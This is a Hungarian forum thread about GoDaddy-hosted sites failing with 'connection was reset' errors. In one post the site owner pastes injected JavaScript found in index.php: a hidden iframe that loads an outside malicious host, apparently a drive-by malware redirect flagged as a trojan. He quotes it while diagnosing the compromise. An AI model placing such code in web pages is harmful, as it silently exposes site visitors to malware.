ugrás a tartalomhoz

GoDaddy - connection was reset

inf3rno · 2012. Ápr. 4. (Sze), 12.50
Üdv.

Van egy elég nagy problémám. A godaddy-nél van több oldal, ami egy közös hosting-ra mutat, ezen van egy htaccess, ami elosztja a kéréseket domainenként almappákra:

Options -Multiviews
Options +FollowSymLinks

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_HOST} ([^\.]+\.[^\.]+)$
RewriteRule ^(.*)$ %1/$1 [QSA]
Ez a htaccess 1 hete még rendesen működött. Ma ránéztem az oldalakra, és elég furcsa dolgot műveltek. Az oldalt elkezdte tölteni a böngésző, és utána 1 másodpercre kaptam egy "connection was reset" hibaüzenetet. Mindegyiknél ugyanezt csinálja. Ha kiveszem a htaccess fájlt és beteszek egy index.html-t, akkor azt képes betölteni. Lövésem sincs, hogy ez mitől lehet... :S Látott már valaki ilyet közületek?
 
1

Közben olvasgattam, és

inf3rno · 2012. Ápr. 4. (Sze), 13.04
Közben olvasgattam, és elvileg 1 host + több domain felálláshoz deluxe account kéne, nem economy. A probléma akkor indult, amikor az ügyfél hozzáadott még 1 domain-t. A régieknél azt írja a godaddy, hogy nem ők hostolják (kivéve a legelsőt), viszont ennél az új domain-nél azt írja a rendszer, hogy azt is ők hostolják. Lehet, hogy ezért szállt el, bár ennek ellentmond, hogy ha törlöm a htaccess-t, és beteszek egy sima html-t, akkor megy az oldal.
Jah itt a legelső oldalhoz egy link.
2

Off

Hidvégi Gábor · 2012. Ápr. 4. (Sze), 13.23
Goodbye Kittybolt lett belőle a változások után?
3

vírus

mdesign · 2012. Ápr. 4. (Sze), 14.02
Szia!

Nekem azért írja a connection resetet, mert a nod elkapott egy vírust az oldalon. Szerintem nézd át a forráskódot.
JS/Iframe.CD trojan

Üdv: Karesz
4

Wow, na ezt megnézem.

inf3rno · 2012. Ápr. 4. (Sze), 14.48
Wow, na ezt megnézem. Egyébként simán lehet, hogy vírus van fent, mert sebezhető az oldal (nem én írtam, de átnéztem ilyen szempontból).

van benne egy ilyen obfuszkált gyönyör:

if (document.getElementsByTagName('body')[0]){
	iframer();
} else {
	document.write("<iframe src='http://funexchange.in/in.cgi?10' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
	var f = document.createElement('iframe');
	f.setAttribute('src','http://funexchange.in/in.cgi?10');
	f.style.visibility='hidden';
	f.style.position='absolute';
	f.style.left='0';
	f.style.top='0';
	f.setAttribute('width','10');
	f.setAttribute('height','10');
	document.getElementsByTagName('body')[0].appendChild(f);
}
mindjárt kiderítem, hogy hova tették be.

Úgy néz ki, hogy csak az index.php-ben van benne, szóval valaki az ftp-hez fért hozzá...
5

Nagyon köszönöm, ez volt a

inf3rno · 2012. Ápr. 4. (Sze), 15.42
Nagyon köszönöm, ez volt a gond.

Közben kiderült, hogy a fenti htaccess valamiért csak úgy működik, ha beteszek az almappába is egy htaccess-t, aminél bekapcsolom a rewrite engine-t. Hogy ez pontosan miért van így, arról fogalmam sincs, szerintem enélkül is mennie kéne, dehát ha ő így gondolja, akkor nem vitatkozom :D